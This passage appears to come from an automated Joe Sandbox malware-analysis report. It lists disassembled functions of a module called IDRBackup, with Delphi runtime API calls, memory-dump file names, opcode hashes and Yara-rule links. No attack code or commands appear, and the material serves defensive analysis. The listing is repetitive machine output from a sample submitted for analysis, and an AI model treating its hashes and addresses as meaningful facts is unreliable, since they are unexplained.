                                                                                                  • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A720
                                                                                                  • @Sysutils@StrLen$qqrpxc.RTL120(?,?,?,00000003,00000000,00000000), ref: 5002A733
                                                                                                  • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A758
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Sysutils@$String$qqrpxcxi$Len$qqrpxcStringUnicode$Except$qqrvException@$bctr$qqrx20ExtractFileLoadModuleName$qqruiName$qqrx20RaiseRecxiString$qqrp20Stringpx14System@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1154392791-0
                                                                                                  • Opcode ID: 3dce76c8eb215aedfc1eb9f086bf8e2351b8edb69d44172689399a892dcc44c1
                                                                                                  • Instruction ID: 490cf656cc89e769677ed1d8ac02a07099c920838aaedf4d8d0b1e3e7b1f0adf
                                                                                                  • Opcode Fuzzy Hash: 3dce76c8eb215aedfc1eb9f086bf8e2351b8edb69d44172689399a892dcc44c1
                                                                                                  • Instruction Fuzzy Hash: FF41D474A0168A9FDB04CF94DC91ADEB7F4EF18304F40467AE905E7241EA34AE05CBA0
                                                                                                  Function 50011698 Relevance: 16.6, APIs: 11, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500117DF), ref: 500116C6
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 500116E3
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 5001171B
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500117DF), ref: 5001174C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500117DF), ref: 50011751
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 5001176E
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,500117DF), ref: 5001177A
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,500117DF), ref: 50011788
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120(00000000,500117DF), ref: 50011798
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$Character@StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Ascii$qqrbAsg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1016462649-0
                                                                                                  • Opcode ID: e1c3648808a7966ff7b4d89349605bd0866a16b14a5e335949c975cf6d57a822
                                                                                                  • Instruction ID: d8a2c921cb0381c3f4e4b64832713658ab93ef8ffd1cbe9df7beed8a80b09d51
                                                                                                  • Opcode Fuzzy Hash: e1c3648808a7966ff7b4d89349605bd0866a16b14a5e335949c975cf6d57a822
                                                                                                  • Instruction Fuzzy Hash: D541E234A081899FDF15DFA8EC816EDB7F5AF04200F5842A6E540E7391E7749E86C791
                                                                                                  Function 50010ADC Relevance: 16.6, APIs: 11, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010C23), ref: 50010B0A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010B27
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010B5F
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010C23), ref: 50010B90
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010C23), ref: 50010B95
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010BB2
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50010C23), ref: 50010BBE
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50010C23), ref: 50010BCC
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120(00000000,50010C23), ref: 50010BDC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$Character@StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Ascii$qqrbAsg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1016462649-0
                                                                                                  • Opcode ID: 055fdcc4fd2cb603ec54a412d362998b8024ac72caa7866e3aaa1dae6ff76cc5
                                                                                                  • Instruction ID: e0cb8508ea0ee3c123a5ca94656853c590a1bcf096955fea472a91734319ba04
                                                                                                  • Opcode Fuzzy Hash: 055fdcc4fd2cb603ec54a412d362998b8024ac72caa7866e3aaa1dae6ff76cc5
                                                                                                  • Instruction Fuzzy Hash: 2041C334A042899BDF11DFA8EC815EFB7F5AF44304F5043A6E980E7256D7B49E85D780
                                                                                                  Function 50011878 Relevance: 16.6, APIs: 11, Instructions: 113COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500119B9), ref: 500118A6
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 500118C3
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 500118FB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500119B9), ref: 5001192C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500119B9), ref: 50011931
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 5001194E
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,500119B9), ref: 5001195A
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,500119B9), ref: 50011992
                                                                                                  • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120(00000000,500119B9), ref: 50011997
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$Character@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20CategoryCategory$qqrx20CheckExcept$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiSeparator$qqr26StringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2188507345-0
                                                                                                  • Opcode ID: 85115377bf31bf0ae937a71f4f08936809c5e55ff9e9a0035250b4a8e60bbdc2
                                                                                                  • Instruction ID: 70db1d6cf51ae63cbd989f7e97dabe6d18dd781c46a6f130b903eaa5e37548f1
                                                                                                  • Opcode Fuzzy Hash: 85115377bf31bf0ae937a71f4f08936809c5e55ff9e9a0035250b4a8e60bbdc2
                                                                                                  • Instruction Fuzzy Hash: B531A030A00289ABEF15DFA4ECA16EDB7F9EF45300F984266E950D7241EB709EC1D791
                                                                                                  Function 5001113C Relevance: 16.6, APIs: 11, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011268), ref: 5001116A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 50011187
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 500111BF
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50011268), ref: 500111F0
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50011268), ref: 500111F5
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 50011212
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50011268), ref: 5001121E
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50011268), ref: 5001122C
                                                                                                  • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120(00000000,50011268), ref: 50011231
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$Character@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20CategoryCategory$qqrx20CheckExcept$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiSeparator$qqr26StringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2188507345-0
                                                                                                  • Opcode ID: 8add54bfcd6dd47ba13f697dc763ddc4121468a9bd01c1802535063be17968c9
                                                                                                  • Instruction ID: 5ac73815b234001b978d6f963799290576de029f4385e846c2353e19faa8a449
                                                                                                  • Opcode Fuzzy Hash: 8add54bfcd6dd47ba13f697dc763ddc4121468a9bd01c1802535063be17968c9
                                                                                                  • Instruction Fuzzy Hash: E831E130A00289ABDF05DFA4EC916EEB7F5EF55200F5442A6EA00E7641D7709E82C781
                                                                                                  Function 5002DC38 Relevance: 16.6, APIs: 11, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002DC60
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002DC65
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DC88
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DC8D
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCB0
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCB5
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002DCBC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCE1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCE6
                                                                                                  • @Sysutils@TEncoding@GetCharCount$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,?,?), ref: 5002DCF3
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(?,?,?,?), ref: 5002DD0D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$RaiseStringSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$ArrayLength$qqrv$AfterArray$tuc%iiCharClassClassoConstruction$qqrp14Count$qqrx25Create$qqrp17DynamicEncoding@Error$qqrucList$qqrvLoadMetaObjectString$qqrp20System@%
                                                                                                  • String ID:
                                                                                                  • API String ID: 599856924-0
                                                                                                  • Opcode ID: 39a4f14e8c5afb2c123811a7d51c8647724a787ebbbc59abf295d9c5b720c570
                                                                                                  • Instruction ID: 0309c5079e81be2084f52493be9e10f0a15843ad46e8c2d9995aaba0ab869005
                                                                                                  • Opcode Fuzzy Hash: 39a4f14e8c5afb2c123811a7d51c8647724a787ebbbc59abf295d9c5b720c570
                                                                                                  • Instruction Fuzzy Hash: A3319371A05586ABDB00DFD8ECD1BAEB7B9BB58304F50826AF904D7352CB71AD01CB90
                                                                                                  Function 5002B33C Relevance: 16.6, APIs: 11, Instructions: 85COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B37F
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B391
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3A1
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3A9
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3C6
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000001,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3DB
                                                                                                  • @System@@DynArrayHigh$qqrv.RTL120 ref: 5002B3E6
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5002B408
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5002B416
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$ArrayStringStringx20$Asg$qqrr20Length$qqrv$Cat3$qqrr20Char$qqrr20Copy$qqrx20FromHigh$qqrvInt$qqrx20StringiiStringpbStringt2Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2891979734-0
                                                                                                  • Opcode ID: 62cae7c73cfc9a71c568ecde9f2d99c8dca23b157ec7d973969221ac07eb201c
                                                                                                  • Instruction ID: 33f49da7cf7d534711dd3b735e4964b946f028d1e955376cf8d5b37d4a493396
                                                                                                  • Opcode Fuzzy Hash: 62cae7c73cfc9a71c568ecde9f2d99c8dca23b157ec7d973969221ac07eb201c
                                                                                                  • Instruction Fuzzy Hash: CB313274A01189DBEB00EF94E991AAEB7B8EF44300F508276E9059B356DB34EE45CB90
                                                                                                  Function 50030940 Relevance: 16.6, APIs: 11, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,50030A24), ref: 500309A6
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,50030A24), ref: 500309A1
                                                                                                    • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                    • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                    • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,50030A24), ref: 50030992
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 50030975
                                                                                                    • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 500309B2
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 500309C6
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,50030A24), ref: 500309E3
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,50030A24), ref: 500309F2
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50030A24), ref: 500309F7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
